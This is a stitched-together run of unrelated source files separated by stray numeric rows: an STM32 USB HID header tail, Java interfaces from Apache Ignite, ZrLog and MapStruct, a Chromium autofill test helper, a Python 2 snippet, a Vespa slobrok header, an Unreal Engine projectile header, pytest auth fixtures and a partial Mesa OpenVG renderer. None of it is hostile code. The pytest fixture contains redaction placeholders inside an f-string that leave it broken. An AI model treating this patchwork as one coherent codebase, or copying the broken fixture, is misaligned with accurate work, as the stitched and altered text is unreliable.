#define USB_HID_DESC_SIZ 9U
#define HID_MOUSE_REPORT_DESC_SIZE 74U
#define HID_DESCRIPTOR_TYPE 0x21U
#define HID_REPORT_DESC 0x22U
#ifndef HID_HS_BINTERVAL
#define HID_HS_BINTERVAL 0x07U
#endif /* HID_HS_BINTERVAL */
#ifndef HID_FS_BINTERVAL
#define HID_FS_BINTERVAL 0x0AU
#endif /* HID_FS_BINTERVAL */
#define HID_REQ_SET_PROTOCOL 0x0BU
#define HID_REQ_GET_PROTOCOL 0x03U
#define HID_REQ_SET_IDLE 0x0AU
#define HID_REQ_GET_IDLE 0x02U
#define HID_REQ_SET_REPORT 0x09U
#define HID_REQ_GET_REPORT 0x01U
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_TypesDefinitions
* @{
*/
typedef enum
{
HID_IDLE = 0,
HID_BUSY,
}
HID_StateTypeDef;
typedef struct
{
uint32_t Protocol;
uint32_t IdleState;
uint32_t AltSetting;
HID_StateTypeDef state;
}
USBD_HID_HandleTypeDef;
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_Macros
* @{
*/
/**
* @}
*/
/** @defgroup USBD_CORE_Exported_Variables
* @{
*/
extern USBD_ClassTypeDef USBD_HID;
#define USBD_HID_CLASS &USBD_HID
/**
* @}
*/
/** @defgroup USB_CORE_Exported_Functions
* @{
*/
uint8_t USBD_HID_SendReport(USBD_HandleTypeDef *pdev,
uint8_t *report,
uint16_t len);
uint32_t USBD_HID_GetPollingInterval(USBD_HandleTypeDef *pdev);
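/* Hedged usage sketch (not part of the ST header): sending a relative mouse report
 * from application code. The hUsbDeviceFS handle is the usual CubeMX-generated
 * device instance and is an assumption here; the 4-byte layout (buttons, X, Y, wheel)
 * matches the boot-mouse report implied by HID_EPIN_SIZE.
 *
 *   uint8_t report[HID_EPIN_SIZE] = {0x00, 5, 0, 0};
 *   USBD_HID_SendReport(&hUsbDeviceFS, report, sizeof(report));
 */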
/**
* @}
*/
#ifdef __cplusplus
}
#endif
#endif /* __USB_HID_H */
/**
* @}
*/
/**
* @}
*/
/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
| 1,502 |
4,339 |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.ignite.lang;
import java.io.Serializable;
/**
 * Grid-aware adapter for {@link Runnable} implementations. It adds the {@link Serializable}
 * interface to {@link Runnable} so instances can be serialized and shipped across the grid.
 * Use this interface for executing distributed computations on the grid, as in the
 * {@link org.apache.ignite.IgniteCompute#run(IgniteRunnable)} method.
 */
public interface IgniteRunnable extends Runnable, Serializable {
// No-op.
}
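// Hedged usage sketch (not part of the original source): running a serializable closure
// on the grid. The Ignition.start() call and local-node setup are assumptions made
// purely for illustration.
//
//   try (Ignite ignite = Ignition.start()) {
//       ignite.compute().run((IgniteRunnable) () -> System.out.println("Hello from the grid"));
//   }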
| 325 |
14,668 |
<reponame>zealoussnow/chromium<gh_stars>1000+
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/autofill/core/browser/test_autofill_profile_validator.h"
#include <memory>
#include "base/base_paths.h"
#include "base/bind.h"
#include "base/files/file_path.h"
#include "base/path_service.h"
#include "third_party/libaddressinput/src/cpp/include/libaddressinput/null_storage.h"
#include "third_party/libaddressinput/src/cpp/test/testdata_source.h"
namespace {
using ::i18n::addressinput::Source;
using ::i18n::addressinput::Storage;
using ::i18n::addressinput::NullStorage;
using ::i18n::addressinput::TestdataSource;
} // namespace
namespace autofill {
namespace {
std::unique_ptr<::i18n::addressinput::Source> GetInputSource() {
base::FilePath file_path;
CHECK(base::PathService::Get(base::DIR_SOURCE_ROOT, &file_path));
file_path = file_path.Append(FILE_PATH_LITERAL("third_party"))
.Append(FILE_PATH_LITERAL("libaddressinput"))
.Append(FILE_PATH_LITERAL("src"))
.Append(FILE_PATH_LITERAL("testdata"))
.Append(FILE_PATH_LITERAL("countryinfo.txt"));
return std::make_unique<TestdataSource>(true, file_path.AsUTF8Unsafe());
}
std::unique_ptr<::i18n::addressinput::Storage> GetInputStorage() {
return std::unique_ptr<Storage>(new NullStorage);
}
} // namespace
// static
AutofillProfileValidator* TestAutofillProfileValidator::GetInstance() {
static base::LazyInstance<TestAutofillProfileValidator>::DestructorAtExit
instance = LAZY_INSTANCE_INITIALIZER;
return &(instance.Get().autofill_profile_validator_);
}
// static
TestAutofillProfileValidatorDelayed*
TestAutofillProfileValidator::GetDelayedInstance() {
static base::LazyInstance<TestAutofillProfileValidator>::DestructorAtExit
instance = LAZY_INSTANCE_INITIALIZER;
return &(instance.Get().autofill_profile_validator_delayed_);
}
TestAutofillProfileValidator::TestAutofillProfileValidator()
: autofill_profile_validator_(GetInputSource(), GetInputStorage()),
autofill_profile_validator_delayed_(GetInputSource(), GetInputStorage()) {
}
TestAutofillProfileValidator::~TestAutofillProfileValidator() {}
} // namespace autofill
| 853 |
397 |
package com.zrlog.business.service;
public interface InstallAction {
/**
     * Called when the installation flow completes successfully; mainly used for configuration,
     * starting the JFinal plugin features, and the corresponding ZrLog plugin services.
*/
void installFinish();
}
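// Hedged sketch (not part of the original source): a minimal implementation that only
// logs completion; a real implementation would start the JFinal plugins and the ZrLog
// plugin services described in the Javadoc above.
//
//   public class LoggingInstallAction implements InstallAction {
//       @Override
//       public void installFinish() {
//           System.out.println("ZrLog installation finished; starting plugin services.");
//       }
//   }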
| 147 |
4,054 |
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
#pragma once
#include "named_service.h"
#include "monitor.h"
#include <vespa/fnet/frt/invoker.h>
namespace slobrok {
//-----------------------------------------------------------------------------
class IRpcServerManager;
/**
* @class ManagedRpcServer
* @brief A NamedService that is managed by this location broker
*
* This class contains the logic to monitor the connection to a
* NamedService and also to do a healthCheck using the RPC method
* slobrok.checkRpcServer on the connection, notifying its
* manager using callbacks in the IRpcServerManager interface.
**/
class ManagedRpcServer: public NamedService,
public FRT_IRequestWait,
public FNET_Task,
public IMonitoredServer
{
public:
ManagedRpcServer(const ManagedRpcServer&) = delete;
ManagedRpcServer& operator=(const ManagedRpcServer&) = delete;
ManagedRpcServer(const std::string & name, const std::string & spec, IRpcServerManager &manager);
~ManagedRpcServer();
void healthCheck();
void PerformTask() override;
private:
IRpcServerManager &_mmanager;
Monitor _monitor;
FRT_Target *_monitoredServer;
FRT_RPCRequest *_checkServerReq;
void cleanupMonitor();
bool validateRpcServer(uint32_t numstrings,
FRT_StringValue *strings);
public:
void RequestDone(FRT_RPCRequest *req) override;
void notifyDisconnected() override; // lost connection to service
};
//-----------------------------------------------------------------------------
} // namespace slobrok
| 600 |
577 |
class foo:
def bar():
return 'bar'
try:
foo.bar()
except TypeError:
pass
else:
print 'unbound method must be called with class instance 1st argument'
| 67 |
5,133 |
<gh_stars>1000+
/*
* Copyright MapStruct Authors.
*
* Licensed under the Apache License version 2.0, available at http://www.apache.org/licenses/LICENSE-2.0
*/
package org.mapstruct.ap.test.nestedsource.parameter;
import org.mapstruct.InheritInverseConfiguration;
import org.mapstruct.Mapper;
import org.mapstruct.Mapping;
import org.mapstruct.Mappings;
import org.mapstruct.factory.Mappers;
/**
*
* @author <NAME>
*/
@Mapper
public interface LetterMapper {
LetterMapper INSTANCE = Mappers.getMapper( LetterMapper.class );
@Mappings( {
@Mapping( target = "fontType", source = "font.type"),
@Mapping( target = "fontSize", source = "font.size"),
@Mapping( target = "letterHeading", source = "heading"),
@Mapping( target = "letterBody", source = "body"),
@Mapping( target = "letterSignature", source = "dto.signature")
} )
LetterEntity normalize(LetterDto dto);
@InheritInverseConfiguration
@Mapping(target = "font", source = "entity")
LetterDto deNormalizeLetter(LetterEntity entity);
@Mappings( {
@Mapping( target = "type", source = "fontType"),
@Mapping( target = "size", source = "fontSize")
} )
FontDto deNormalizeFont(LetterEntity entity);
}
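// Hedged usage sketch (not part of the original source): flattening a DTO whose font data
// lives in a nested property, then mapping back. The LetterDto instance "dto" is assumed
// to be populated by the caller.
//
//   LetterEntity entity = LetterMapper.INSTANCE.normalize(dto);
//   LetterDto roundTrip = LetterMapper.INSTANCE.deNormalizeLetter(entity);
//   FontDto font = LetterMapper.INSTANCE.deNormalizeFont(entity);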
| 458 |
617 |
<filename>Source/RTSProject/Plugins/RealTimeStrategy/Source/RealTimeStrategy/Classes/Combat/RTSProjectile.h
#pragma once
#include "CoreMinimal.h"
#include "GameFramework/Actor.h"
#include "Templates/SubclassOf.h"
#include "RTSProjectile.generated.h"
class UProjectileMovementComponent;
class USoundCue;
/**
* Projectile with RTS features, such as following a target and dealing damage.
*/
UCLASS()
class REALTIMESTRATEGY_API ARTSProjectile : public AActor
{
GENERATED_BODY()
public:
ARTSProjectile(const FObjectInitializer& ObjectInitializer = FObjectInitializer::Get());
/** Locks on to the specified target, dealing damage on impact. */
UFUNCTION(BlueprintCallable)
void FireAt(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
virtual void Tick(float DeltaSeconds) override;
/** Event when this projectile hits its target. */
virtual void NotifyOnProjectileDetonated(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
/** Event when this projectile hits its target. */
UFUNCTION(BlueprintImplementableEvent, Category = "RTS", meta = (DisplayName = "OnProjectileDetonated"))
void ReceiveOnProjectileDetonated(
AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileInstigator,
AActor* ProjectileDamageCauser);
private:
/** Whether the projectile should follow a ballistic trajectory on its way. Should not be used with homing projectiles. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
bool bBallisticTrajectory;
/** How much to exaggerate the ballistic trajectory. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bBallisticTrajectory))
float BallisticTrajectoryFactor;
/** Whether this projectile causes an area of effect when hitting its target location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
bool bApplyAreaOfEffect;
/** Radius around impact location in which targets take damage. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect, ClampMin = 0))
float AreaOfEffect;
/** Object types to query when finding area of effect targets near the impact location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect))
TArray<TEnumAsByte<EObjectTypeQuery>> AreaOfEffectTargetObjectTypeFilter;
/** Actor class to filter by when finding area of effect targets near the impact location. */
UPROPERTY(EditDefaultsOnly, Category = "RTS", meta = (EditCondition = bApplyAreaOfEffect))
TSubclassOf<AActor> AreaOfEffectTargetClassFilter;
/** Sound to play when the projectile is fired. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
USoundCue* FiredSound;
/** Sound to play on projectile impact. */
UPROPERTY(EditDefaultsOnly, Category = "RTS")
USoundCue* ImpactSound;
bool bFired;
UPROPERTY()
AActor* Target;
FVector TargetLocation;
float Damage;
TSubclassOf<class UDamageType> DamageType;
UPROPERTY()
AController* EventInstigator;
UPROPERTY()
AActor* DamageCauser;
float TimeToImpact;
/** How far away the projectile started flying towards its target. */
float InitialDistance;
/** How far above the ground the projectile started flying towards its target. */
float InitialHeight;
/** How far above the ground the target was when the projectile started flying towards it. */
float TargetHeight;
/** Angle at which the projectile has been launched if following a ballistic trajectory. */
float LaunchAngle;
UPROPERTY(VisibleAnywhere, Category = "RTS")
UProjectileMovementComponent* ProjectileMovement;
UFUNCTION(NetMulticast, Reliable)
void MulticastFireAt(AActor* ProjectileTarget,
float ProjectileDamage,
TSubclassOf<class UDamageType> ProjectileDamageType,
AController* ProjectileEventInstigator,
AActor* ProjectileDamageCauser);
void HitTargetActor(AActor* Actor);
void HitTargetLocation();
};
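// Hedged usage sketch (not part of the original header): how a firing actor might spawn
// and launch this projectile. ProjectileClass, MuzzleTransform and TargetActor are
// placeholders owned by the caller; the 25.0f damage value and base UDamageType are
// illustrative only.
//
//   ARTSProjectile* Projectile =
//       GetWorld()->SpawnActor<ARTSProjectile>(ProjectileClass, MuzzleTransform);
//   if (Projectile)
//   {
//       Projectile->FireAt(TargetActor, 25.0f, UDamageType::StaticClass(),
//                          GetInstigatorController(), this);
//   }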
| 1,384 |
2,103 |
import base64
import pytest
from h.models.auth_client import GrantType
@pytest.fixture
def authority():
return "example.com"
@pytest.fixture
def user(_user_for_authority, authority):
return _user_for_authority(authority)
@pytest.fixture
def auth_header(auth_header_for_authority, authority):
return auth_header_for_authority(authority)
@pytest.fixture
def auth_header_for_authority(db_session, factories):
def _make_headers(authority):
auth_client = factories.ConfidentialAuthClient(
authority=authority, grant_type=GrantType.client_credentials
)
db_session.commit()
user_pass = f"{auth_<PASSWORD>}:{auth_client.<PASSWORD>}".encode("utf-8")
encoded = base64.standard_b64encode(user_pass).decode("ascii")
return {"Authorization": f"Basic {encoded}"}
return _make_headers
@pytest.fixture
def token_auth_header(db_session, factories, user):
token = factories.DeveloperToken(userid=user.userid)
db_session.add(token)
db_session.commit()
return {"Authorization": f"Bearer {token.value}"}
@pytest.fixture
def _user_for_authority(db_session, factories):
def _make_user(authority):
user = factories.User(authority=authority)
db_session.commit()
return user
return _make_user
| 508 |
2,151 |
/**************************************************************************
*
* Copyright 2009 VMware, Inc. All Rights Reserved.
* Copyright 2010 LunarG, Inc. All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sub license, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice (including the
* next paragraph) shall be included in all copies or substantial portions
* of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT.
* IN NO EVENT SHALL VMWARE AND/OR ITS SUPPLIERS BE LIABLE FOR
* ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
* TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
* SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
**************************************************************************/
#include "renderer.h"
#include "vg_context.h"
#include "pipe/p_context.h"
#include "pipe/p_state.h"
#include "util/u_inlines.h"
#include "pipe/p_screen.h"
#include "pipe/p_shader_tokens.h"
#include "util/u_draw_quad.h"
#include "util/u_simple_shaders.h"
#include "util/u_memory.h"
#include "util/u_sampler.h"
#include "util/u_surface.h"
#include "util/u_math.h"
#include "util/u_format.h"
#include "cso_cache/cso_context.h"
#include "tgsi/tgsi_ureg.h"
typedef enum {
RENDERER_STATE_INIT,
RENDERER_STATE_COPY,
RENDERER_STATE_DRAWTEX,
RENDERER_STATE_SCISSOR,
RENDERER_STATE_CLEAR,
RENDERER_STATE_FILTER,
RENDERER_STATE_POLYGON_STENCIL,
RENDERER_STATE_POLYGON_FILL,
NUM_RENDERER_STATES
} RendererState;
typedef enum {
RENDERER_VS_PLAIN,
RENDERER_VS_COLOR,
RENDERER_VS_TEXTURE,
NUM_RENDERER_VS
} RendererVs;
typedef enum {
RENDERER_FS_COLOR,
RENDERER_FS_TEXTURE,
RENDERER_FS_SCISSOR,
RENDERER_FS_WHITE,
NUM_RENDERER_FS
} RendererFs;
struct renderer {
struct pipe_context *pipe;
struct cso_context *cso;
VGbitfield dirty;
struct {
struct pipe_rasterizer_state rasterizer;
struct pipe_depth_stencil_alpha_state dsa;
struct pipe_framebuffer_state fb;
} g3d;
struct matrix projection;
struct matrix mvp;
struct pipe_resource *vs_cbuf;
struct pipe_resource *fs_cbuf;
VGfloat fs_cbuf_data[32];
VGint fs_cbuf_len;
struct pipe_vertex_element velems[2];
VGfloat vertices[4][2][4];
void *cached_vs[NUM_RENDERER_VS];
void *cached_fs[NUM_RENDERER_FS];
RendererState state;
/* state data */
union {
struct {
VGint tex_width;
VGint tex_height;
} copy;
struct {
VGint tex_width;
VGint tex_height;
} drawtex;
struct {
VGboolean restore_dsa;
} scissor;
struct {
VGboolean use_sampler;
VGint tex_width, tex_height;
} filter;
struct {
struct pipe_depth_stencil_alpha_state dsa;
VGboolean manual_two_sides;
VGboolean restore_dsa;
} polygon_stencil;
} u;
};
/**
* Return VG_TRUE if the renderer can use the resource as the asked bindings.
*/
static VGboolean renderer_can_support(struct renderer *renderer,
struct pipe_resource *res,
unsigned bindings)
{
struct pipe_screen *screen = renderer->pipe->screen;
return screen->is_format_supported(screen,
res->format, res->target, 0, bindings);
}
/**
* Set the model-view-projection matrix used by vertex shaders.
*/
static void renderer_set_mvp(struct renderer *renderer,
const struct matrix *mvp)
{
struct matrix *cur = &renderer->mvp;
struct pipe_resource *cbuf;
VGfloat consts[3][4];
VGint i;
/* projection only */
if (!mvp)
mvp = &renderer->projection;
/* re-upload only if necessary */
if (memcmp(cur, mvp, sizeof(*mvp)) == 0)
return;
/* 3x3 matrix to 3 constant vectors (no Z) */
for (i = 0; i < 3; i++) {
consts[i][0] = mvp->m[i + 0];
consts[i][1] = mvp->m[i + 3];
consts[i][2] = 0.0f;
consts[i][3] = mvp->m[i + 6];
}
cbuf = renderer->vs_cbuf;
pipe_resource_reference(&cbuf, NULL);
cbuf = pipe_buffer_create(renderer->pipe->screen,
PIPE_BIND_CONSTANT_BUFFER,
PIPE_USAGE_STATIC,
sizeof(consts));
if (cbuf) {
pipe_buffer_write(renderer->pipe, cbuf,
0, sizeof(consts), consts);
}
pipe_set_constant_buffer(renderer->pipe,
PIPE_SHADER_VERTEX, 0, cbuf);
memcpy(cur, mvp, sizeof(*mvp));
renderer->vs_cbuf = cbuf;
}
/**
* Create a simple vertex shader that passes through position and the given
* attribute.
*/
static void *create_passthrough_vs(struct pipe_context *pipe, int semantic_name)
{
struct ureg_program *ureg;
struct ureg_src src[2], constants[3];
struct ureg_dst dst[2], tmp;
int i;
ureg = ureg_create(TGSI_PROCESSOR_VERTEX);
if (!ureg)
return NULL;
/* position is in user coordinates */
src[0] = ureg_DECL_vs_input(ureg, 0);
dst[0] = ureg_DECL_output(ureg, TGSI_SEMANTIC_POSITION, 0);
tmp = ureg_DECL_temporary(ureg);
for (i = 0; i < Elements(constants); i++)
constants[i] = ureg_DECL_constant(ureg, i);
/* transform to clipped coordinates */
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_X), src[0], constants[0]);
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_Y), src[0], constants[1]);
ureg_MOV(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_Z), src[0]);
ureg_DP4(ureg, ureg_writemask(tmp, TGSI_WRITEMASK_W), src[0], constants[2]);
ureg_MOV(ureg, dst[0], ureg_src(tmp));
if (semantic_name >= 0) {
src[1] = ureg_DECL_vs_input(ureg, 1);
dst[1] = ureg_DECL_output(ureg, semantic_name, 0);
ureg_MOV(ureg, dst[1], src[1]);
}
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Set renderer vertex shader.
*
* This function modifies vertex_shader state.
*/
static void renderer_set_vs(struct renderer *r, RendererVs id)
{
/* create as needed */
if (!r->cached_vs[id]) {
int semantic_name = -1;
switch (id) {
case RENDERER_VS_PLAIN:
break;
case RENDERER_VS_COLOR:
semantic_name = TGSI_SEMANTIC_COLOR;
break;
case RENDERER_VS_TEXTURE:
semantic_name = TGSI_SEMANTIC_GENERIC;
break;
default:
assert(!"Unknown renderer vs id");
break;
}
r->cached_vs[id] = create_passthrough_vs(r->pipe, semantic_name);
}
cso_set_vertex_shader_handle(r->cso, r->cached_vs[id]);
}
/**
* Create a simple fragment shader that sets the depth to 0.0f.
*/
static void *create_scissor_fs(struct pipe_context *pipe)
{
struct ureg_program *ureg;
struct ureg_dst out;
struct ureg_src imm;
ureg = ureg_create(TGSI_PROCESSOR_FRAGMENT);
out = ureg_DECL_output(ureg, TGSI_SEMANTIC_POSITION, 0);
imm = ureg_imm4f(ureg, 0.0f, 0.0f, 0.0f, 0.0f);
ureg_MOV(ureg, ureg_writemask(out, TGSI_WRITEMASK_Z), imm);
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Create a simple fragment shader that sets the color to white.
*/
static void *create_white_fs(struct pipe_context *pipe)
{
struct ureg_program *ureg;
struct ureg_dst out;
struct ureg_src imm;
ureg = ureg_create(TGSI_PROCESSOR_FRAGMENT);
out = ureg_DECL_output(ureg, TGSI_SEMANTIC_COLOR, 0);
imm = ureg_imm4f(ureg, 1.0f, 1.0f, 1.0f, 1.0f);
ureg_MOV(ureg, out, imm);
ureg_END(ureg);
return ureg_create_shader_and_destroy(ureg, pipe);
}
/**
* Set renderer fragment shader.
*
* This function modifies fragment_shader state.
*/
static void renderer_set_fs(struct renderer *r, RendererFs id)
{
/* create as needed */
if (!r->cached_fs[id]) {
void *fs = NULL;
switch (id) {
case RENDERER_FS_COLOR:
fs = util_make_fragment_passthrough_shader(r->pipe);
break;
case RENDERER_FS_TEXTURE:
fs = util_make_fragment_tex_shader(r->pipe,
TGSI_TEXTURE_2D, TGSI_INTERPOLATE_LINEAR);
break;
case RENDERER_FS_SCISSOR:
fs = create_scissor_fs(r->pipe);
break;
case RENDERER_FS_WHITE:
fs = create_white_fs(r->pipe);
break;
default:
assert(!"Unknown renderer fs id");
break;
}
r->cached_fs[id] = fs;
}
cso_set_fragment_shader_handle(r->cso, r->cached_fs[id]);
}
typedef enum {
VEGA_Y0_TOP,
VEGA_Y0_BOTTOM
} VegaOrientation;
static void vg_set_viewport(struct renderer *r,
VegaOrientation orientation)
{
const struct pipe_framebuffer_state *fb = &r->g3d.fb;
struct pipe_viewport_state viewport;
VGfloat y_scale = (orientation == VEGA_Y0_BOTTOM) ? -2.f : 2.f;
viewport.scale[0] = fb->width / 2.f;
viewport.scale[1] = fb->height / y_scale;
viewport.scale[2] = 1.0;
viewport.scale[3] = 1.0;
viewport.translate[0] = fb->width / 2.f;
viewport.translate[1] = fb->height / 2.f;
viewport.translate[2] = 0.0;
viewport.translate[3] = 0.0;
cso_set_viewport(r->cso, &viewport);
}
/**
* Set renderer target.
*
* This function modifies framebuffer and viewport states.
*/
static void renderer_set_target(struct renderer *r,
struct pipe_surface *cbuf,
struct pipe_surface *zsbuf,
VGboolean y0_top)
{
struct pipe_framebuffer_state fb;
memset(&fb, 0, sizeof(fb));
fb.width = cbuf->width;
fb.height = cbuf->height;
fb.cbufs[0] = cbuf;
fb.nr_cbufs = 1;
fb.zsbuf = zsbuf;
cso_set_framebuffer(r->cso, &fb);
vg_set_viewport(r, (y0_top) ? VEGA_Y0_TOP : VEGA_Y0_BOTTOM);
}
/**
* Set renderer blend state. Blending is disabled.
*
* This function modifies blend state.
*/
static void renderer_set_blend(struct renderer *r,
VGbitfield channel_mask)
{
struct pipe_blend_state blend;
memset(&blend, 0, sizeof(blend));
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
if (channel_mask & VG_RED)
blend.rt[0].colormask |= PIPE_MASK_R;
if (channel_mask & VG_GREEN)
blend.rt[0].colormask |= PIPE_MASK_G;
if (channel_mask & VG_BLUE)
blend.rt[0].colormask |= PIPE_MASK_B;
if (channel_mask & VG_ALPHA)
blend.rt[0].colormask |= PIPE_MASK_A;
cso_set_blend(r->cso, &blend);
}
/**
* Set renderer sampler and view states.
*
* This function modifies samplers and fragment_sampler_views states.
*/
static void renderer_set_samplers(struct renderer *r,
uint num_views,
struct pipe_sampler_view **views)
{
struct pipe_sampler_state sampler;
unsigned tex_filter = PIPE_TEX_FILTER_NEAREST;
unsigned tex_wrap = PIPE_TEX_WRAP_CLAMP_TO_EDGE;
uint i;
memset(&sampler, 0, sizeof(sampler));
sampler.min_img_filter = tex_filter;
sampler.mag_img_filter = tex_filter;
sampler.min_mip_filter = PIPE_TEX_MIPFILTER_NONE;
sampler.wrap_s = tex_wrap;
sampler.wrap_t = tex_wrap;
sampler.wrap_r = PIPE_TEX_WRAP_CLAMP_TO_EDGE;
sampler.normalized_coords = 1;
/* set samplers */
for (i = 0; i < num_views; i++)
cso_single_sampler(r->cso, PIPE_SHADER_FRAGMENT, i, &sampler);
cso_single_sampler_done(r->cso, PIPE_SHADER_FRAGMENT);
/* set views */
cso_set_sampler_views(r->cso, PIPE_SHADER_FRAGMENT, num_views, views);
}
/**
* Set custom renderer fragment shader, and optionally set samplers and views
* and upload the fragment constant buffer.
*
* This function modifies fragment_shader, samplers and fragment_sampler_views
* states.
*/
static void renderer_set_custom_fs(struct renderer *renderer,
void *fs,
const struct pipe_sampler_state **samplers,
struct pipe_sampler_view **views,
VGint num_samplers,
const void *const_buffer,
VGint const_buffer_len)
{
cso_set_fragment_shader_handle(renderer->cso, fs);
/* set samplers and views */
if (num_samplers) {
cso_set_samplers(renderer->cso, PIPE_SHADER_FRAGMENT, num_samplers, samplers);
cso_set_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT, num_samplers, views);
}
/* upload fs constant buffer */
if (const_buffer_len) {
struct pipe_resource *cbuf = renderer->fs_cbuf;
if (!cbuf || renderer->fs_cbuf_len != const_buffer_len ||
memcmp(renderer->fs_cbuf_data, const_buffer, const_buffer_len)) {
pipe_resource_reference(&cbuf, NULL);
cbuf = pipe_buffer_create(renderer->pipe->screen,
PIPE_BIND_CONSTANT_BUFFER, PIPE_USAGE_STATIC,
const_buffer_len);
pipe_buffer_write(renderer->pipe, cbuf, 0,
const_buffer_len, const_buffer);
pipe_set_constant_buffer(renderer->pipe,
PIPE_SHADER_FRAGMENT, 0, cbuf);
renderer->fs_cbuf = cbuf;
if (const_buffer_len <= sizeof(renderer->fs_cbuf_data)) {
memcpy(renderer->fs_cbuf_data, const_buffer, const_buffer_len);
renderer->fs_cbuf_len = const_buffer_len;
}
else {
renderer->fs_cbuf_len = 0;
}
}
}
}
/**
* Setup renderer quad position.
*/
static void renderer_quad_pos(struct renderer *r,
VGfloat x0, VGfloat y0,
VGfloat x1, VGfloat y1,
VGboolean scissor)
{
VGfloat z;
/* the depth test is used for scissoring */
z = (scissor) ? 0.0f : 1.0f;
/* positions */
r->vertices[0][0][0] = x0;
r->vertices[0][0][1] = y0;
r->vertices[0][0][2] = z;
r->vertices[1][0][0] = x1;
r->vertices[1][0][1] = y0;
r->vertices[1][0][2] = z;
r->vertices[2][0][0] = x1;
r->vertices[2][0][1] = y1;
r->vertices[2][0][2] = z;
r->vertices[3][0][0] = x0;
r->vertices[3][0][1] = y1;
r->vertices[3][0][2] = z;
}
/**
* Setup renderer quad texture coordinates.
*/
static void renderer_quad_texcoord(struct renderer *r,
VGfloat x0, VGfloat y0,
VGfloat x1, VGfloat y1,
VGint tex_width, VGint tex_height)
{
VGfloat s0, t0, s1, t1, r0, q0;
VGint i;
s0 = x0 / tex_width;
s1 = x1 / tex_width;
t0 = y0 / tex_height;
t1 = y1 / tex_height;
r0 = 0.0f;
q0 = 1.0f;
/* texcoords */
r->vertices[0][1][0] = s0;
r->vertices[0][1][1] = t0;
r->vertices[1][1][0] = s1;
r->vertices[1][1][1] = t0;
r->vertices[2][1][0] = s1;
r->vertices[2][1][1] = t1;
r->vertices[3][1][0] = s0;
r->vertices[3][1][1] = t1;
for (i = 0; i < 4; i++) {
r->vertices[i][1][2] = r0;
r->vertices[i][1][3] = q0;
}
}
/**
* Draw renderer quad.
*/
static void renderer_quad_draw(struct renderer *r)
{
util_draw_user_vertex_buffer(r->cso, r->vertices, PIPE_PRIM_TRIANGLE_FAN,
Elements(r->vertices), /* verts */
Elements(r->vertices[0])); /* attribs/vert */
}
/**
* Prepare the renderer for copying.
*/
VGboolean renderer_copy_begin(struct renderer *renderer,
struct pipe_surface *dst,
VGboolean y0_top,
struct pipe_sampler_view *src)
{
assert(renderer->state == RENDERER_STATE_INIT);
/* sanity check */
if (!renderer_can_support(renderer,
dst->texture, PIPE_BIND_RENDER_TARGET) ||
!renderer_can_support(renderer,
src->texture, PIPE_BIND_SAMPLER_VIEW))
return VG_FALSE;
cso_save_framebuffer(renderer->cso);
cso_save_viewport(renderer->cso);
cso_save_blend(renderer->cso);
cso_save_samplers(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_sampler_views(renderer->cso, PIPE_SHADER_FRAGMENT);
cso_save_fragment_shader(renderer->cso);
cso_save_vertex_shader(renderer->cso);
renderer_set_target(renderer, dst, NULL, y0_top);
renderer_set_blend(renderer, ~0);
renderer_set_samplers(renderer, 1, &src);
renderer_set_fs(renderer, RENDERER_FS_TEXTURE);
renderer_set_vs(renderer, RENDERER_VS_TEXTURE);
renderer_set_mvp(renderer, NULL);
/* remember the texture size */
renderer->u.copy.tex_width = src->texture->width0;
